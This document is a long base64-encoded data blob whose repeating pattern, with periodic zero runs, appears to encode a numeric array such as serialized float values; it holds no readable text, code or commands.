V+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV